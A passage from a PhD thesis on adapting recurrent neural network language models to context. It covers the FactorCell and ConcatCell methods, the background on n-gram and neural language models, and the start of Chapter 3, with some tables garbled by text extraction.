model that assumes a 1 star review. Blue indicates a higher 5 star likelihood and red is a higher likelihood for the 1 star condition. . . . . . . . 51 4.4 Accuracy vs. Perplexity for different classes of models on the two character- based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53 4.5 Comparison of the effect of LSTM parameter count and FactorCell rank hy- perparameters on perplexity for DBPedia. . . . . . . . . . . . . . . . . . . . 54 4.6 Distribution of a PCA projection of hotel embeddings from the TripAdvisor FactorCell model showing the grouping of the hotels by city. . . . . . . . . . 56 4.7 Distribution of a PCA projection of the hotel embeddings from the TripAd- visor FactorCell model showing the grouping of hotels by class. . . . . . . . . 57 5.1 Perplexity versus MRR on the development data for different classes of models. 67 5.2 Relative improvement in MRR over the unpersonalized model versus queries seen using the large size models. Plot uses a moving average of width 9 to reduce noise. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68 5.3 MRR by prefix and query lengths for the large FactorCell and unadapted models with the first 50 queries per user excluded. . . . . . . . . . . . . . . . 69 iii 6.1 Context classification accuracy versus generation context-specificity for each type of adaptation on the Yelp data. . . . . . . . . . . . . . . . . . . . . . . 78 6.2 Plot of FactorCell rank and perplexity against generation context-specificity accuracy for 14 FactorCell models on the Yelp restaurant data. . . . . . . . . 79 6.3 Context-specificity of hotel class versus FactorCell rank and perplexity in gen- erated reviews using the models learned on the TripAdvisor data. . . . . . . 82 6.4 Context classification accuracy versus generation context-specificity for each type of adaptation on the TripAdvisor data. . . . . . . . . . . . . . . . . . . 82 iv LIST OF TABLES Table Number Page 1.1 Example use cases for language model adaptation . . . . . . . . . . . . . . . 3 2.1 Approaches to RNN language model adaptation in prior work. The X indicates the use of the ConcatCell (CC) or the SoftmaxBias (SB) adaptation strategy 19 3.1 Number of sentences, vocabulary size and context variables for the three corpora. 25 3.2 Summary of Key Hyperparamters . . . . . . . . . . . . . . . . . . . . . . . . 27 3.3 Perplexities and Classification Avg. AUCs for Reddit Models . . . . . . . . . 28 3.4 Nearest neighbors to selected subreddits in the context embedding space. . . 29 3.5 Comparison of perplexities per subreddit . . . . . . . . . . . . . . . . . . . . 31 3.6 Results on Twitter data. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32 3.7 Results on the SCOTUS data in terms of perplexity and classification accuracy (ACC) for the justice identification task. . . . . . . . . . . . . . . . . . . . . 35 3.8 Perplexities for different combinations of context variables on the SCOTUS corpus. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36 3.9 Sentences generated from the adapted model using beam search under different assumptions for speaker and role contexts. . . . . . . . . . . . . . . . . . . . 36 4.1 Dataset statistics: Dataset size in words (* or characters) of Train, Dev and Test sets, vocabulary size, number of training documents, and context variables. 42 4.2 Selected hyperparameters for each dataset. When a range is listed it means that a different values were selected for the FactorCell, ConcatCell, Soft- maxBias or Unadapted models. . . . . . . . . . . . . . . . . . . . . . . . . . 46 4.3 Perplexity and classification accuracy on the test set for the four word-based datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47 4.4 Perplexity and classification accuracies for the EuroTwitter and GeoTwitter datasets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52 4.5 The top boosted words in the Softmax bias layer for different context settings in a FactorCell model. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58 v 5.1 Top five completions for the prefix ba for a cold start model with no previous queries from that user and a warm model that has seen the queries espn, sports news, nascar, yankees, and nba. . . . . . . . . . . . . . . . . . . . 63 5.2 MRR reported for seen and unseen prefixes for small (S) and big (B) models. 68 5.3 The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “high school softball” and “math homework help”. . 70 5.4 The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “prada handbags” and “versace eyewear”. . . . . . . . 71 5.5 The five queries that have the greatest adapted vs. unadapted likelihood ratio after searching for “discount flights” and “yellowstone vacation packages”. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 71 6.1 Top completions for the sentence “My boyfriend and I ate here and !” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . 76 6.2 Top completions for the sentence “This was my first time coming here and the food was ” after conditioning on each star rating. . . . . . . 76 6.3 Top completions for the sentence “I will again” after conditioning on each star rating. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76 6.4 Automatically judged generation accuracy, mean absolute deviation (MAD), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the Yelp data. . . . . . . . . . . . . . 79 6.5 Automatically judged generation accuracy, mean absolute deviation (MAD), and perplexity for the three methods of adaptation compared to the unadapted baseline using the models learned from the TripAdvisor data. . . . . . . . . . 81 A.1 Perplexity on the validation set of models with no adaptation and varying softmax adaptation strategies. Results are not comparable to those in Chapter 4 because of a difference in vocabulary size. . . . . . . . . . . . . . . . . . . 107 vi ACKNOWLEDGMENTS First, I would like to thank my advisor Prof. Mari Ostendorf for her excellent men- torship and for her constant encouragement, patience, and support. I have had the pleasure of working with her on many projects during the last five years and in each case her deep experience has been a valuable asset. I would also like to thank the other members of my thesis committee, Hannaneh Hajishirzi and Noah Smith, with whom I have had the pleasure of collaborating. My peers and colleagues at the University of Washington have played a key role in my graduate experience. My interactions with them has been the most enjoyable part of my graduate education. I would like to thank Ji He, Hao Fang, Vicky Zay- ats, Yi Luan, Hao Cheng, Trang Tran, Kevin Lybarger, Farah Nadeem, Rik Koncel- Kedziorski, and Shobhit Hathi. I am very fortunate to have been able to work along- side these students. I thank Arjun Sondhi for the many fruitful discussions. I am grateful to the mentors I had during my internships, including Henry Schnei- derman, Larry Heck, Eric Ringger, and Hetunandan Kamisetty. Each of them taught me important research skills and changed my perspective on the field. This thesis would not have been possible without the experience I gained from working with them. I thank my parents Jeff and Rebecca Jaech, who have given me their unwavering support, unconditional love, and constant encouragement during all my many years of schooling. Lastly, I acknowledge my lovely girlfriend Gayoung Park, who understands the struggles of a Ph.D student and who has spent many long days and late nights vii working by my side. I thank her for her help and for reminding me to always have fun. viii 1 Chapter 1 INTRODUCTION 1.1 Overview Language is a highly adaptable means of communication and as humans we routinely vary our usage of it to match our environment. Changes in language from one setting to another can include large differences in topic, register, politeness, etc. depending on a host of vari- ables such as the social context, the medium of communication, the time and location, and the task at hand. If statistical language models can be made to mimic this contextual adapt- ability, then they will be useful in a wider range of applications, including speech recognition, machine translation, abstractive summarization, text generation, and more. Without context awareness, static models are incredibly brittle, meaning they are “ex- tremely sensitive to changes in the style, topic, or genre” (Rosenfeld, 2000). Performance drastically degrades when a model is used in a context other than the one for which it was trained. An early study looked at incorporating text from the Associated Press for modeling contemporaneous articles from the Wall Street Journal (Rosenfeld, 1996). Even though the difference in style between two American news organizations is relatively minor compared to the variations in language that are likely to be observed in other applications, the Associated Press text was practically useless for this task. Unfortunately, it is often the case that there is a limited amount of text available for learning a language model to characterize a particular context. Therefore, researchers have long sought ways to more effectively use different sources of data. This area of research is often referred to as domain adaptation, characterized by making use of data from multiple contexts to target a particular context. Domain adaptation has been explored for a wide variety of contexts, as shown in Table 1.1. As an illustration of the importance of context, 2 Figure 1.1: Usage of the terms “Black Friday” and “Super Bowl” on Reddit during an eight year time period. Figure 1.1 shows the bursty variation of the frequency of two terms in eight years of text from Reddit. Mentions of these two events increase in likelihood by several orders of magnitude during predictable but narrow windows of time. This illustrates both why models that ignore context are brittle and why there is so much to be gained from adaptation. Context is often represented by partitioning data into in-domain and out-of-domain sets. The in-domain data is considered to be sampled from the same or a similar distribution as the evaluation data and the out-of-domain data is everything else. A simple adaptation method is to build separate models for the in-domain corpus and out-of-domain corpora and then choose the interpolation weights to give the best performance on the in-domain data. There can be multiple out-of-domain corpora that are treated separately but typically no attempt is made to model the similarities or differences between domains/contexts. The problem with this adaptation approach is that the notions of discrete domains are much too crude when the goal is to mimic the fine-grained contextual adaptations that humans typically employ. 3 Category Purpose Topic Adjust to variations in topic across documents or in speech. This is the most popular use case for adaptation techniques. Temporal Changing language usage patterns over time (Rosenfeld, 1995; Os- borne et al., 2014; Yogatama et al., 2014) Geographic Variations in speaking style in different geographic regions (Eisenstein et al., 2010; Chelba et al., 2015; Halpern et al., 2016) Modality Adapt a model trained on written text for use in conversational speech (Bulyko et al., 2003; Jaech and Ostendorf, 2015; Mendels et al., 2015) Language Share information between similar languages (Ragni et al., 2016; Östling and Tiedemann, 2017) TV Programs & Youtube Channels Adapt to styles and topics of different television shows (Chen et al., 2015; Deena et al., 2016) Lectures, Talks, & Meetings Use text from slides, lecture titles, and other written materials to bias language model in speech recognition (Schwarm et al., 2004; Glass et al., 2007; Hsu and Glass, 2008; Hoang et al., 2016) Dialog State Generate an appropriate response given the dialog state (Riccardi and Gorin, 2000; Liu and Lane, 2017) Personalization Match the model predictions to the style of each individual from a large group (Tseng et al., 2015; Li et al., 2016) Table 1.1: Example use cases for language model adaptation 4 In the newspaper example, instead of relying solely on a single binary variable indicating domain membership (AP vs. WSJ), additional contextual variables could have been used. For example, we could have a variable to indicate which section of the paper the article appeared in, or who the author was, or the date of publication. In general, the context representation can leverage multiple discrete and continuous variables—the more expressive the contextual representation, the greater the ability of the model to adapt to it. Ideally, a context-aware language model could model text using the style of one newspaper and the topic of a different publication. While researchers have tried to do this with class language models, equating word class sequences with style, many real-world applications are best characterized by interacting combinations of several contextual factors. Therefore, this thesis investigates models that can use rich context representations. Language is often produced in association with some information about its context. For example, in speech recognition, if a user is speaking to a personal assistant then the system might know the time of day or the identity of the task that the user is trying to accomplish. If the user takes a picture of a sign to translate it with their smart phone, the system would have contextual information related to the geographic location and the user’s preferred language. The probability of certain terms and phrases appearing can change dramatically with respect to geographic location (Chelba and Shazeer, 2015). When adapting to context information, the language model conditions on both the con- text and the previous words in the sequence. It is computing P(w1:n|context). The mech- anism for computing P(w1:n) impacts the approach for accounting for context. Recurrent neural networks (RNNs) have been shown to be very effective language models compared to previous approaches such as n-gram models or maximum entropy models (Mikolov et al., 2010), in part because they are able to make use of arbitrarily long word histories. RNN based language models are the focus of this thesis due to their recent successes and current widespread use. Improvements in adapting RNNs are likely to have a positive impact on multiple tasks. In addition, the continuous-space approach is well-suited to characterizing multiple contextual variables. 5 The standard method of adapting RNN language models is due to Mikolov and Zweig (2012) and involves learning an embedding to represent the context (originally the output of a topic model but any type of learned embedding will work) and including it via concatenation as an additional input to the model. We refer to this method of adapting the recurrent layer as the ConcatCell because of its reliance on concatenation of the context embedding. As we will show later on, when using this adaptation method most of the parameters of the model are static with respect to context. We propose a more powerful mechanism for using a context vector, which we call the FactorCell. Rather than simply using context as an additional input, it is used to control a factored (low-rank) transformation of the recurrent layer weight matrix. The motivation is that allowing a greater fraction of the model parameters to be adjusted in response to the input context will produce a model that is more adaptable and responsive to that context. In addition, we introduce a mechanism for handling new contexts that emerge after the model has been trained and deployed, showing how adaptation can be effective in these scenarios as well. 1.2 Key Contributions The primary goal of this work is to increase the adaptability of recurrent neural network language models. Our main contribution is to propose a novel mechanism, which we call the FactorCell, for using a context embedding vector to transform the weights of the recur- rent layer. This is a fundamentally different way of adapting the recurrent layer. Instead of viewing context as an additional input to the RNN, we create a function that uses con- text information to output the weights of a custom RNN that matches the given context. Moreover, by using precomputation and caching techniques, the FactorCell delivers superior adaptation at little to no extra computational cost. We demonstrate the superiority of the FactorCell model over commonly used methods for RNN adaptation, including several recent approaches that do not adapt at the recurrent layer, preferring to focus on the output bias vector. Experiments on nine datasets with varying domains, contexts, and model and vocabulary sizes confirms that adapting the recurrent layer 6 always helps. We also show that our model beats the current standard method of adapting the recurrent layer. The extensive experimentation leads to some useful observations for predicting when context conditioning will be more or less successful for a given dataset. The many prior use cases for adaptation mentioned in Section 1.1 all have in common the requirement that all contexts be known during training. Another contribution is to introduce an online learning method for adapting to contexts that emerge after the model has been deployed. Online learning improves the quality of the adaptation and also widens the set of possible applications. We use a personalized query auto-completion task to demonstrate how this method can be successfully used. Again, our FactorCell model beats the standard approach to adaptation and the performance gap widens as more data becomes available over time. Adaptation is vital for language models to work in real world applications. We show how the FactorCell model impacts multiple applications and discuss potential implications for many more. The first application is the just mentioned personalized query completion. Another important application is context-specific or controllable text generation. We show how the FactorCell model is significantly more controllable than the standard adaptation methods. The gap between our model and the standard approach is not easily closed even when we give the baseline an advantage by doubling the dimensionality of its recurrent layer. Automatic evaluation of context-specific text generation can be difficult. We propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. For both the query completion and text generation applications we show through analysis that the FactorCell model has qualitative benefits that are not fully captured by perplexity as an evaluation criterion. 1.3 Thesis Overview The remainder of the thesis proceeds as follows. In Chapter 2, we provide background information on language modeling and adaptation. 7 We review relevant prior work in these areas including the ConcatCell and SoftmaxBias models from Mikolov and Zweig (2012) that serve as the principal baselines for the rest of the thesis. In Chapter 3, we show that the ConcatCell model is effectively a constant additive bias in the recurrent layer. We then explore trade-offs of different architectures for adapting at the recurrent layer and the output layer. We make some observations about what factors make a dataset more or less amenable to adaptation. In Chapter 4, we introduce the FactorCell, a more powerful model for RNN adaptation. By controlling the rank of a low-rank context-dependent weight transformation, the Fac- torCell can be adjusted to allow for more or less sharing of information between contexts depending on the situation. This model remedies the prominent weakness of the Concat- Cell, namely, that it often does not allow its predictions to be changed enough in response to context. We show that the FactorCell beats the ConcatCell in terms of perplexity and that it also does better at capturing the relationship between context and language in text classification experiments. In Chapter 5, we introduce an approach for adapting to new contexts that emerge after the model has been trained and deployed, and apply the FactorCell model to the task of personalized query auto-completion. The key result is that stronger adaptability at the recurrent layer enables the model to better take advantage of information from new users’ query histories to personalize their predictions. Chapter 6 deals with the use of language model adaptation for context-specific text generation. We measure context-specificity by checking if the text sampled from or generated by the model matches the properties of the specified context. We show that when the adaptation is weaker (as in the ConcatCell) then context-specificity suffers; the FactorCell model gives clear wins for context-specificity. We propose a metric based on text classification that is predictive of human ratings for text generation performance and avoids many of the headaches of prior evaluation techniques. Finally, Chapter 7 concludes the thesis by summarizing the contributions and suggesting 8 future directions for additional research. 9 Chapter 2 BACKGROUND This chapter gives the necessary background information on language modeling and prior literature on adaptation. The contributions of the thesis build on these ideas. 2.1 General Language Modeling Background Language models compute a probability distribution over word sequences w1:n where each wi is drawn from a vocabulary V . Typically, the probability is factored using the chain rule: P(w1:n) = P(w1) ∏n i=2 P(wi|w1:i−1). The w1:i−1 term is often referred to as the history. Dealing with data sparseness is fundamental to language modeling because there will always be many valid word sequences that are not observed in the training data. One way to categorize language models is to look at how they deal with the sparseness or generalization problem: n-gram models use a back-off strategy, maximum entropy models rely regularization techniques, and the different classes of neural networks generalize by finding low dimensional continuous space representations of language. In the basic n-gram language model only the most recent n−1 words from the history are considered (Bahl et al., 1978). In the common case that n = 3, known as a trigram model, P(wi|w1:i−1) is approximated as P(wi|wi−1,wi−2). Even with this simplifying assumption, sparseness is a problem. Estimating the parameters of an n-gram language model using maximum likelihood fails to assign proper estimates to the n-grams that are unobserved in the training data, and there will be many such n-grams. The remedy is to borrow from the probability mass given to some of the observed n-grams and distribute it to unobserved ones (Katz, 1987). The redistribution is done recursively, reducing the size of the n-gram history in each step. The methods used for the back-off smoothing has been improved over time 10 (Kneser and Ney, 1995; ?), but the basic idea has remained the same. One improvement was to add skip-grams, which are like n-grams except they can skip over some words to look farther back in the history (Siu and Ostendorf, 2000; Shazeer et al., 2015). A variant of skip-grams is to identify long range triggers such as by using information from a syntactic parse (Bellegarda, 2000). The class language model is an extension of the standard n-gram model that operates on a set of word equivalence classes (Brown et al., 1992). For a trigram, the probabilities are factored as P(wi|wi−1,wi−2) = P(wi|ci)P(ci|ci−1,ci−2). The use of classes reduces the effective size of the vocabulary when estimating P(ci|ci−1,ci−2) and thereby improves the reliability of those estimates and possibly allowing for use of a higher n-gram order. This is the advantage of the class language model formulation. However the gain in reliability is associated with a loss of detail that can lead to mixed results. The difficulty, for several decades, in finding a practical improvement over n-gram lan- guage models, despite their obvious weaknesses, was described as being a “source of consid- erable irritation” to researchers in the field (Jelinek, 1991). A decade later, Rosenfeld (2000) calls it ironic that “the most popular language models (n-grams) take no advantage of the fact that what’s being modeled is language.” And yet, even now with many alternatives to choose from, n-gram models continue to be heavily used. Their strengths are that they make few assumptions other than the Markov property, training the models is as fast as counting n-grams, and they use a vast number of parameters to memorize idiomatic and exceptional expressions. 2.1.1 Vocabulary & Input Representation An important design choice in language modeling is to define the vocabulary. Typically, the vocabulary is set by taking the set of all words that appear at least k times in the training corpus for some small k. Over time, as more powerful computers and bigger text corpora became available, the typical vocabulary size used in applications has likewise increased. Figure 2.1 shows the change in vocabulary size for large vocabulary continuous speech recog- 11 nition systems over time with a doubling in vocabulary size approximately every four years. Similar increases are observed for other applications. Figure 2.1: Vocabulary size in large vocabulary continuous speech recognition systems over time. Exploding vocabulary sizes lead to exponential growth in model size and exponential increases in the time required for speech decoding. This trend is obviously not sustainable. Dealing with the exponential growth is a challenge but also an opportunity for considerable amounts on innovation. Research is proceeding into neural systems that can decode audio directly into text one character at a time (Graves and Jaitly, 2014; Chan et al., 2015; Bahdanau et al., 2016; Maas et al., 2015). The language model can be a character n-gram model trained separately or an LSTM that is part of the larger neural network and trained end-to-end. When training end- to-end, the objective is to minimize the error rate instead of aiming to minimize perplexity. Machine translation is also moving away from using word-based language models (Lee et al., 12 2017; Chung et al., 2016). Google’s machine translation system uses a small vocabulary of around 30,000 tokens that are a mix of words and subwords (Wu et al., 2016). Character-based models are far from a new concept. Subword models have found use before especially when working with highly inflected or low-resource languages (Tucker et al., 1994; Creutz et al., 2007; Saraçlar et al., 2010); however, there has been a recent surge of interest in character- and subword-based models. This thesis makes a point of testing on both word- and character-level models so as to have maximum impact on future applications. 2.1.2 Evaluation & Metrics Language model evaluation is often done on a held-out test set using perplexity as a metric: perplexity = exp(− 1 N N∑ i=1 log p(wi)). (2.1) See Equation 2.1. Perplexity was always recognized as a “crude” metric (Jelinek, 1990, 1991) but is still widely used because it offers a quick and easy task-independent way of evaluating a language model. Perplexity is not the only factor that matters when comparing models, however. Models can be interesting for other reasons such as speed (Brants et al., 2007). In some cases, the models are evaluated using downstream metrics like word error rate in speech recognition or BLEU score in machine translation (Kirchhoff and Yang, 2005) instead of using perplex- ity. For text generation, human evaluations can be high quality but are costly to perform. Perplexity will be the main evaluation metric used in this thesis due to the desire to be task-independent and the need to control costs, but some experiments with other metrics are included. Recently, some language modeling papers have used “dynamic evaluation”, whereby the model is allowed to continue to train on the test data after making predictions for each segment (Krause et al., 2017). This is a form of online updating and it helps to adapt to shifts between the training and the test data. Dynamic evaluation makes less sense for certain applications such as speech recognition because it can reinforce errors in the transcription. 13 Language models can be fairly compared without the use of dynamic evaluation. Thus, we do not make use of it in this thesis except that we do use a form of online updating for one of our experiments that will be introduced in Chapter 5, where the application makes sense. 2.2 Neural Language Modeling Continuous-space language models such as the neural probabilistic language model (Ben- gio et al., 2003a) obtain an advantage over n-gram models because they share information between n-grams by projecting to a low-dimensional continuous space. Recurrent neural network (RNN) language models (Mikolov et al., 2010) extend that advantage by permitting the incorporation of information from arbitrarily long word histories. The RNN language model in its basic form has three layers: an input layer, a recurrent layer, and an output layer. The input layer learns a word embedding matrix E ∈ Rp×|V | that consists of a p- dimensional vector for each word in the vocabulary V . If the input w1,w2, . . .wn is rep- resented as one-hot encoded vectors then multiplying by E gives a sequence of word em- beddings, ew1,ew2, . . .ewn = Ew1,Ew2, . . .Ewn. The recurrent layer uses a weight matrix W ∈ Rq×(p+q) and a bias vector b1 ∈ Rq to transform the word embedding for the current step ewt and its own output from the previous step ht−1 into a hidden state vector ht that summarizes the sequence up to that point. The formula is given by Equation 2.2 where σ is the activation function, typically the hyperbolic tangent or a restricted linear unit (ReLU): ht = σ(W[ewt,ht−1] + b1). (2.2) The output layer uses the hidden state vector ht to estimate a probability distribution yt over the vocabulary for wt+1: yt = softmax(E Tht + b2). (2.3) The bias vector b2 ∈ R|V | acts as a prior on the unigram distribution and is a crucial part of the output layer. If the word embedding size p is not the same as the recurrent layer 14 dimensionality q then a linear projection can be inserted and the word embedding matrix E from the input layer can be reused in the output layer to save on parameters and increase generalizability (Press and Wolf, 2017; Inan et al., 2016). In this case, the equation for the output layer would be yt = Softmax(E T Pht + b2). The parameters of the model, E, W, b1, and b2, can all be learned jointly via backpropagation through time towards the objective of maximizing the likelihood of the data. One limitation of neural language models, as originally proposed, is that the training time scales poorly with the size of the vocabulary. A variety of techniques were developed as workarounds. Neural models were trained to predict only the words from a subset of the vocabulary known as a shortlist (Schwenk, 2004), and the predictions from the neural model were interpolated with an n-gram model that could handle a full-sized vocabulary. Shortly thereafter, hierarchical neural models were developed. These train faster with only a small decrease in perplexity (Morin and Bengio, 2005). Techniques such as importance sampling (Bengio et al., 2003b) and noise contrastive estimation (Mnih and Kavukcuoglu, 2013) make it possible to quickly train full size vocabulary models without a hierarchy. The method used for training large vocabulary models in this thesis is the sampled softmax from Jean et al. (2014). The sampled softmax constrains the vocabulary to a small random subset when computing the loss for each sequence avoiding the need to backpropagate to the full vocabulary for every weight update. For a thorough review of methods for training large vocabulary neural language models, see (Chen et al., 2016). The basic RNN has a flaw known as the vanishing/exploding gradient problem that pre- vents it from learning to use information from far back in the history (Pascanu et al., 2013). In practice, this is mitigated by using alternate architectures such as long short-term memory (LSTM) or the gated recurrent unit (GRU) (Sundermeyer et al., 2012). These architectures use gating mechanisms to control the flow of information and importantly they permit the preservation of information from the hidden state over time. Our experiments make exten- sive use of these RNN variants. Other techniques have been developed to further increase the stability of the RNN. In some of our experiments, we make use of layer normalization 15 which involves normalizing the first and second moments of the W[ewt,ht−1] + b1 term in Equation 2.2 (Ba et al., 2016). In the early 1990s it was noted that n-gram language models benefit from boosting the probability of words observed in previous utterances or in earlier parts of a document because word usage is “bursty” (Jelinek et al., 1991). Once a word is observed in a given document, the probability of seeing it again is greatly increased. Models that boost the probability of recently seen words are called cache language models (Kuhn and De Mori, 1990). These techniques have been extended to RNN language models by allowing the model to look back at the previous hidden states from the same sentence or document (Merity et al., 2017b; Grave et al., 2017a). Usually, state-of-the-art language modeling results are reported both with and without the inclusion of a cache, e.g. Merity et al. (2017a), because the gain from a cache is considered to be orthogonal to other modeling improvements. The experiments in this thesis are reported without the inclusion of a cache in order to focus on our contributions to adaptation. 2.3 Language Model Adaptation There is a long history of adapting n-gram language models starting from early work on mixture modeling (DeMori and Federico, 1999; Bellegarda, 2004). Since this thesis builds on neural models, the review of prior work will only cover these methods. The long-established mixture techniques also apply to neural network models (Irie et al., 2018), but our focus is on techniques that are specific to neural network adaptation. We are most interested in cases with explicit representations of context, however, one adaptation method, model fine-tuning, does not require the use of a context embedding. The language model is first trained on general background data and then learning is briefly continued on smaller in-domain data to “fine-tune” the weights (Gangireddy et al., 2016; Zhang et al., 2017). Fine-tuning suffers from the possibility of catastrophic forgetting, where the model loses access to the information it learned from training on the background data (Goodfellow et al., 2013). One way of dealing with catastrophic forgetting is to freeze portions 16 of the model during fine-tuning. Some approaches combine fine-tuning with the addition of a new linear transformation in between the hidden and output layers (Deena et al., 2016), or occasionally a non-linear transformation is used instead (Ma et al., 2017). This is motivated in part by similar approaches for adapting acoustic models in speech recognition (Gemello et al., 2007). Adaptation of neural language models has two parts: representing context information and using the context representation to alter the model predictions. We discuss these next. 2.3.1 Context Representations For neural language model adaptation, context information is typically represented as an embedding vector. Neural networks have the advantage in that they are quite versatile in the types of inputs that they can accept. Another advantage is that the network can learn the context representations as part of the end-to-end language modeling task. Some of the types of context that could be or have been used are 1. Topic model vectors that summarize the topic of long documents (Mikolov and Zweig, 2012). 2. Context is the title of a TED talk and it is represented as an embedding using either bag-of-words features or using an RNN or CNN (Hoang et al., 2016). 3. Context is a one-hot encoded vector indicating an Amazon product identifier and an- other one-hot vector indicating the sentiment of a review of that product (Tang et al., 2016). The context information can be categorical, numeric, textual information, or a combina- tion of these. It could even be composed of attributes that are predicted using a machine learning system based on other features. The majority of experiments in this thesis use categorical context variables but the methods all apply to other cases. 17 We assume the availability of contextual information (metadata or other side information) that is represented as a set of context variables f1:n = f1,f2, . . .fn, from which we produce a k-dimensional representation in the form of an embedding, c ∈ Rk. Each of the context variables, fi, represents some type of information or metadata about the sequence and can be either categorical or numerical. We adopt the strategy from Tang et al. (2016) of combining information from multiple context variables using a simple neural network. This strategy is well-suited for the types of context variables that we will see in our experiments, particularly high dimensional contexts such as hotel identity in a review or user identity in a query completion task. For each context variable fi, we learn an associated embedding matrix Fi, i = 1, . . . ,n. If n = 1 then the embedding can directly be used as the context representation. Otherwise, a single layer neural network is used to combine the embeddings from the individual variables. c = tanh( ∑ i MiFifi + b0) (2.4) In some cases the tanh activation function is replaced with the ReLU function instead. Mi and b0 are parameters learned by the model. The context embedding, c, is used for adapting both the hidden and the output layer of the RNN. 2.3.2 Adaptation Mechanisms Mikolov and Zweig (2012) were the first to propose a method for adapting RNN language models by augmenting both Equations 2.2 and 2.3 with an extra term. The adaptation depends on having a summary of the context information contained in an embedding vector c ∈ Rk. To adapt the recurrent layer they concatenate the context embedding c with the word embedding at every step of the input, which we show in the next chapter is equivalent to an additive context-dependent bias. We refer to this form of adaptation as the ConcatCell. ht = σ(W[ewt,ht−1,c] + b1). (2.5) 18 To adapt the output layer, an adaptation term Gc is added, yt = softmax(E Tht + Gc + b2), (2.6) which has the effect of altering the softmax bias in a context dependent way. We refer to models that use this form of adaptation as the SoftmaxBias model. SoftmaxBias adaptation appears to be a reasonable approach in cases where the context concerns topic, since we know that the unigram distribution is often sufficient to capture topical information. As we will show later on, SoftmaxBias adaptation alone is not sufficient to get the best results. This is particularly obvious when dealing with character-level models, where the unigram distribution carries little information about topic or style. In the special case where the context variable is discrete and of low cardinality then the bias vector can be adapted by directly learning independent bias vectors for each context, i.e. replacing the context embedding c with a one-hot encoded vector. When the cardinality of the context variables is high then learning independent bias vectors carries a high memory cost. Although it is not often framed in this way, the Gc term acts as a low-rank approxi- mation to the strategy of learning independent bias vectors. We will use both strategies in this thesis, as the situation warrants. These two adaptation strategies have been adopted for a variety of tasks, including per- sonalization, adapting to television show genres (Chen et al., 2015), adapting to long range dependencies in a document (Ji et al., 2015), etc. See Table 2.1 for a listing of more prior work, showing which of these methods were employed. As shown in the table, a variety of contexts have been used. Topic based adaptation is popular but categorical variables are also used like product identity or sentiment level. When doing personalization, the context can be an identifier for the person (Li et al., 2016), or alternatively the information can be given as a bag-of-words representation of the persons prior utterances or writings (Wen et al., 2013). Few studies have tested the relative merits of adapting at the recurrent layer versus the output layer. Ji et al. (2015) compares the two approaches, which they refer to as ccDCLM 19 M o d e l C C S B C o n te x t T o p ic R N N (D ie n g et a l. , 2 0 1 6 ) X T o p ic m o d el C o n te x t A w a re G en er a ti o n (T a n g et a l. , 2 0 1 6 ) X P ro d u ct id en ti ty a n d se n ti m en t G en er a ti v e T ex t C la ss ifi ca ti o n (Y o g a ta m a et a l. , 2 0 1 7 ) X M is ce ll a n eo u s C o n tr o ll in g S ty le in T ex t G en er a ti o n (F ic le r a n d G o ld b er g , 2 0 1 7 ) X M o v ie re v ie w st y li st ic fe a tu re s C o n te x t D ep en d en t L M (M ik o lo v a n d Z w ei g , 2 0 1 2 ) X X T o p ic m o d el L a n g u a g e M o d el P er so n a li za ti o n (W en et a l. , 2 0 1 3 ) X X S o ci a l m ed ia te x t M u lt i- g en re S p ee ch R ec o g n it io n (C h en et a l. , 2 0 1 5 ) X X T o p ic m o d el C o n te x tu a l L S T M (G h o sh et a l. , 2 0 1 6 ) X T o p ic m o d el P er so n a B a se d C o n v er sa ti o n (L i et a l. , 2 0 1 6 ) X P er so n a li ze d re sp o n se g en er a ti o n F ea tu re -b a se d R N N L M a d a p ta ti o n (D ee n a et a l. , 2 0 1 6 ) X M u lt i- g en re b ro a d ca st sp ee ch T a b le 2 .1 : A p p ro a ch es to R N N la n g u a g e m o d el a d a p ta ti o n in p ri o r w o rk . T h e X in d ic a te s th e u se o f th e C o n ca tC el l (C C ) o r th e S o ft m a x B ia s (S B ) a d a p ta ti o n st ra te g y . 20 and coDCLM. They find that both give similar perplexities. SoftmaxBias wins by 3% on one dataset and by less than 1% on the other. However, adapting the recurrent layer does better at an auxiliary sentence ordering task. Differences between models that are more prominent in other metrics besides perplexity is a theme that we will return to later on in the thesis. They do not test any models that adapt both the recurrent and output layers. Hoang et al. (2016) also consider adapting at the hidden layer vs. at the softmax layer. They report a small advantage towards adapting the output layer but the comparison is only made on a single dataset. It should be noted that not all models fit cleanly into the above framework, although it is the dominant paradigm. The (Hoang et al., 2016) model differs from the SoftmaxBias approach because it use an extra perceptron layer in the output. Luan et al. (2016) use the recurrent layer bias approach plus an extra context-dependent linear projection in between the recurrent and the output layer. Wen et al. (2015) uses a custom gating architecture to adapt to dialogue states. 21 Chapter 3 EXPLORING CONTEXT-AWARE RNNS In this chapter1, we show that the popular RNN hidden layer adaptation strategy de- scribed in the previous chapter corresponds to a static additive bias term. Then, we study the impact of adapting RNNs at the recurrent layer versus the output layer using different architectures and techniques. Starting with the unadapted RNN that makes no use of con- text information, we consider two mechanisms each of adapting the recurrent layer and the output layer respectively. One of the methods for adapting the recurrent layer is a novel mul- tiplicative rescaling of the hidden state dimensions. Using experiments on three datasets, we make some observations about what factors make a dataset more or less amenable to adap- tation. These studies provided the groundwork that led to the proposal of the FactorCell model. 3.1 Additive Bias Adaptation As described in Section 2.3.2, the standard approach to recurrent layer adaptation is to include (via concatenation) the context embedding as an additional input to the recurrent layer. When the context embedding is constant across the whole sequence, it is easy to show that this concatenation is equivalent to using a context-dependent bias at the recurrent layer: ht = σ(Ŵ[ewt,ht−1,c] + b1) = σ(W[ewt,ht−1] + Qc + b1) = σ(W[ewt,ht−1] + b ′ 1), (3.1) 1The content of this chapter draws from our previously published work (Jaech and Ostendorf, 2017) 